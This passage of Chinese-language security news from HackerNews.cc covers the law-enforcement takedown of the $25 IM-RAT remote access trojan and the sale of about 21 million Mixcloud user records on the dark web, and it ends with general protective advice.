5.禁用防病毒和防恶意软件, 6.终止正在运行的进程, 7.执行许多其他操作。 由于IM-RAT的功能,易用性以及终身访问权限,其成本仅为25美元,因此被评定为危险级别。 欧洲刑警组织欧洲网络犯罪中心(EC3)负责人史蒂文·威尔逊说道:“地球另一端的黑客现在只用花25美元就可以通过点击鼠标,访问我们的个人详细信息和亲人的照片,甚至监视我们。” 执法人员认为,IM-RAT受害者的数量下降了数万人,“调查人员已经取得了黑客窃取个人详细信息,密码,私人照片,录像带和数据的犯罪证据”。 在其他类似的国际联合行动中,名为Luminosity Link的远程访问木马的犯罪网络也于两年前被关停。 在Luminosity Link案中,一名21岁开发人员因非法使用计算机,洗钱和非法转移财产而被捕,并被判处 30个月监禁。 为避免成为此类威胁的受害者,我们建议个人用户和组织使您的所有软件升级至最新版本,正确配置防火墙,避免打开可疑的电子邮件附件或URL,并在不同网站上使用不同的密码。   消息来源:TheHackerNews, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

2100 万 Mixcloud 用户数据在暗网出售

在线音乐流媒体服务Mixcloud最近遭到黑客的攻击,用户数据在暗网上出售。 近期,一名昵称为“ A_W_S”的黑客联系了多家媒体曝光了此事件,并提供了数据样本作为数据泄露的证据。 此次攻击发生在11月初,超过2000万个用户帐户的数据遭到曝光。这些数据包括用户名,电子邮件地址,SHA-2哈希密码,帐户注册日期和国家/地区,最近一次登录日期,IP地址以及个人资料照片的链接。 Techcrunch发布的文章称:“我们通过注册功能验证了部分被盗数据。这些被盗数据的确切数量仍是未知。卖方说他们拥有2000万条记录,但暗网上存在2100万条。但根据我们采样的数据,记录可能多达2200万条。” 黑客以0.27比特币(约合2,000美元)的价格出售这些数据。 图片来源:ZDNet   上周六,Mixcloud发布安全公告披露了该事件,该公司同时强调,系统没有存储完整的信用卡号或邮寄地址之类的数据。 “今天晚上我们收到了可信的报告,证实了黑客访问了我们的部分系统。” “此次事件事件涉及电子邮件地址,IP地址和少数用户的密码(安全加密状态)。大多数Mixcloud用户使用Facebook账号进行了注册,我们没有存储这些用户的密码。” Mixcloud 目前正在积极调查此事件,并且建议用户将密码重置。   消息来源:SecurityAffairs, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接